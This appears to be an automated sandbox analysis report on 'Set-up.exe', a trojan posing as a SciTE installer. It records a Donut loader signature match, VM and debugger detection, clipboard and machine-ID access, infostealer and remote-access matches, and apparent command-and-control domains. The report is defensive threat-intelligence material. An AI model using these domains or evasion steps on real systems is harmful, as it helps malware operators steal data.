      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A71DD0 OpenClipboard,Sleep,OpenClipboard,0_2_00A71DD0
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A73200 EmptyClipboard,SetClipboardData,GlobalUnlock,SetClipboardData,SetClipboardData,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,0_2_00A73200
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A71E10 IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,_invalid_parameter_noinfo_noreturn,CloseClipboard,0_2_00A71E10
      Source: Set-up.exe, 00000000.00000000.1722720645.0000000000C64000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_ca5a4307-c

      System Summary

      barindex
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A25F73 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_02A25F73
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A930700_2_00A93070
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A850500_2_00A85050
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A673E00_2_00A673E0
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BE23E00_2_00BE23E0
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6E4100_2_00A6E410
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A894600_2_00A89460
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A645D00_2_00A645D0
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A939900_2_00A93990
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC0BE00_2_00AC0BE0
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A78B400_2_00A78B40
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC6E100_2_00AC6E10
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D05750_2_029D0575
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A25F730_2_02A25F73
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D50D20_2_029D50D2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D00000_2_029D0000
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A131B20_2_02A131B2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029E21DD0_2_029E21DD
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D91C20_2_029D91C2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029E31E30_2_029E31E3
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A0B1220_2_02A0B122
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029E86B30_2_029E86B3
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029FD6A20_2_029FD6A2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D87C20_2_029D87C2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029E27320_2_029E2732
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029F37520_2_029F3752
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029DC4A20_2_029DC4A2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D84220_2_029D8422
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029DB4570_2_029DB457
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029DD4720_2_029DD472
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029E05C20_2_029E05C2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A135320_2_02A13532
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A155720_2_02A15572
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029F0A920_2_029F0A92
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029F0A900_2_029F0A90
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A06AD20_2_02A06AD2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A13A020_2_02A13A02
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A15B120_2_02A15B12
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A04B520_2_02A04B52
      Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00BDAA50 appears 35 times
      Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 029DDF62 appears 48 times
      Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 029DF712 appears 57 times
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600
      Source: Set-up.exeStatic PE information: invalid certificate
      Source: Set-up.exe, 00000000.00000000.1722720645.0000000000C64000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSciTE.EXE, vs Set-up.exe
      Source: Set-up.exe, 00000000.00000003.1828821448.0000000002ED3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSciTE.EXE, vs Set-up.exe
      Source: Set-up.exeBinary or memory string: OriginalFilenameSciTE.EXE, vs Set-up.exe
      Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@11/9
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D0C85 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_029D0C85
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A6D420 CLSIDFromProgID,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00A6D420
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1012
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2b07a11f-329c-489a-8c69-e7250a7a3a90Jump to behavior
      Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Set-up.exeReversingLabs: Detection: 34%
      Source: Set-up.exeVirustotal: Detection: 41%
      Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: Set-up.exeStatic PE information: More than 149 > 100 exports found
      Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: Set-up.exeStatic file information: File size 2729072 > 1048576
      Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1ab800
      Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: Set-up.exe
      Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: Set-up.exeStatic PE information: real checksum: 0x2a5ee3 should be: 0x29f6a1
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A69D45 push dword ptr [ebp+esi*4-75h]; iretd 0_2_00A69D49
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02A0F452 push eax; mov dword ptr [esp], 37363908h0_2_02A0F457
      Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 1.2 %
      Source: C:\Users\user\Desktop\Set-up.exe TID: 4444Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: Amcache.hve.6.drBinary or memory string: VMware
      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849993860.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.6.drBinary or memory string: vmci.sys
      Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
      Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849993860.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
      Source: Amcache.hve.6.drBinary or memory string: VMware20,1
      Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D0575 mov edx, dword ptr fs:[00000030h]0_2_029D0575
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D0B35 mov eax, dword ptr fs:[00000030h]0_2_029D0B35
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D1185 mov eax, dword ptr fs:[00000030h]0_2_029D1185
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_029D1184 mov eax, dword ptr fs:[00000030h]0_2_029D1184
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BFE4EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BFE4EE

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Set-up.exeString found in binary or memory: enlargkiw.sbs
      Source: Set-up.exeString found in binary or memory: resinedyw.sbs
      Source: Set-up.exeString found in binary or memory: mathcucom.sbs
      Source: Set-up.exeString found in binary or memory: allocatinow.sbs
      Source: Set-up.exeString found in binary or memory: condifendteu.sbs
      Source: Set-up.exeString found in binary or memory: drawwyobstacw.sbs
      Source: Set-up.exeString found in binary or memory: vennurviot.sbs
      Source: Set-up.exeString found in binary or memory: ehticsprocw.sbs
      Source: Set-up.exeString found in binary or memory: sippymroat.cfd
      Source: Set-up.exeBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BFDF75 cpuid 0_2_00BFDF75
      Source: C:\Users\user\Desktop\Set-up.exeCode function: GetKeyboardLayout,GetLocaleInfoA,atol,0_2_00A6D240
      Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00BFEFA3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BFEFA3
      Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
